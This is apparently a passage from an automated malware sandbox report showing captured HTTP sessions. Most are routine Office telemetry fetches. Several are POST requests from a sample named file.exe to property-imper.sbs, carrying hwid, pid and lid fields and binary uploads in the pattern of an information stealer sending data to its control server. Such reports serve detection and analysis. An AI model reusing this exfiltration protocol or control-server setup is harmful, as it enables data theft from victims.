                                                                                                                                                                                  2024-11-23 18:52:27 UTC15331OUTData Raw: 2d 2d 51 56 47 57 5a 47 52 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 34 33 42 39 38 37 42 32 38 45 37 34 32 44 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 51 56 47 57 5a 47 52 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 56 47 57 5a 47 52 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 51 56 47 57 5a 47 52 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                  Data Ascii: --QVGWZGRCContent-Disposition: form-data; name="hwid"0C43B987B28E742DD7CBBD6DF28D3732--QVGWZGRCContent-Disposition: form-data; name="pid"3--QVGWZGRCContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--QVGWZGRCContent-Di
                                                                                                                                                                                  2024-11-23 18:52:27 UTC5016OUTData Raw: 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9f
                                                                                                                                                                                  Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                                                                                  2024-11-23 18:52:28 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:28 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=t5nm0cjflc729189tbkjlo3ohc; expires=Wed, 19-Mar-2025 12:39:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9KYri04ADbZg4pGR9j3hyHTv15XMCkYb1L%2BFYcSRcgiLZb88Yg8GP9I7D4BUuiN7m9XPaKU1H2tIVCDjXPtrBPvkQzevZShBXd63g0AunKzoiSHBC6J24mQN9zLu5spsaW83NUg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e735b422a50de9b-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=20852&sent=18&recv=23&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21301&delivery_rate=107697&cwnd=146&unsent_bytes=0&cid=59aa2d4ea9db2dbd&ts=969&x=0"
                                                                                                                                                                                  2024-11-23 18:52:28 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                  Data Ascii: eok 8.46.123.75
                                                                                                                                                                                  2024-11-23 18:52:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  17192.168.2.74971913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:27 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:28 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 486
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9018290B"
                                                                                                                                                                                  x-ms-request-id: aff2abcc-f01e-0003-4547-3c4453000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185228Z-178bfbc474b7cbwqhC1NYC8z4n00000004ug000000004yg4
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  18192.168.2.74971813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:27 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:28 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 427
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                  x-ms-request-id: 6171fc9e-701e-000d-441c-3d6de3000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185228Z-178bfbc474bpscmfhC1NYCfc2c00000003c000000000gq5w
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  19192.168.2.74971713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:27 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:28 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 486
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB344914B"
                                                                                                                                                                                  x-ms-request-id: 3744ce68-601e-00ab-2603-3d66f4000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185228Z-178bfbc474bxkclvhC1NYC69g400000004u0000000009gda
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  20192.168.2.74972013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:27 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:28 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 407
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9698189B"
                                                                                                                                                                                  x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185228Z-178bfbc474b7cbwqhC1NYC8z4n00000004w00000000016uv
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:28 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  21192.168.2.74972213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:29 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:30 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 469
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBA701121"
                                                                                                                                                                                  x-ms-request-id: d02e2b11-101e-00a2-2d3a-3c9f2e000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185230Z-178bfbc474bwh9gmhC1NYCy3rs00000004w000000000f3bd
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:30 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  22192.168.2.74972313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:30 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:30 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                  x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185230Z-174c587ffdfcj798hC1TEB9bq400000003fg00000000bcn1
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:30 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  23192.168.2.74972413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:30 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:30 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 477
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                  x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185230Z-174c587ffdfx984chC1TEB676g00000003a000000000cedm
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:30 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  24192.168.2.749728104.21.33.1164436908C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:30 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=MDIT05D0LGUYNADW
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 1232
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 18:52:30 UTC1232OUTData Raw: 2d 2d 4d 44 49 54 30 35 44 30 4c 47 55 59 4e 41 44 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 34 33 42 39 38 37 42 32 38 45 37 34 32 44 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4d 44 49 54 30 35 44 30 4c 47 55 59 4e 41 44 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 44 49 54 30 35 44 30 4c 47 55 59 4e 41 44 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                  Data Ascii: --MDIT05D0LGUYNADWContent-Disposition: form-data; name="hwid"0C43B987B28E742DD7CBBD6DF28D3732--MDIT05D0LGUYNADWContent-Disposition: form-data; name="pid"1--MDIT05D0LGUYNADWContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                                  2024-11-23 18:52:31 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:30 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=fpmfdi8n7of79bt4r26bf9airn; expires=Wed, 19-Mar-2025 12:39:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c91SmYFdBKG%2B0aBIi%2F%2BjYMvlh0DykwFFsRuzGdz1GMGzCxaNN3g5MuBudz3%2FGo9vbb6Da6x5uXzGsnhlPnHVurC%2FNYDN2Fa%2FYeI7Y8ChM3y%2FRqg2akrGdO9q%2BFccblfTLknGYL8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
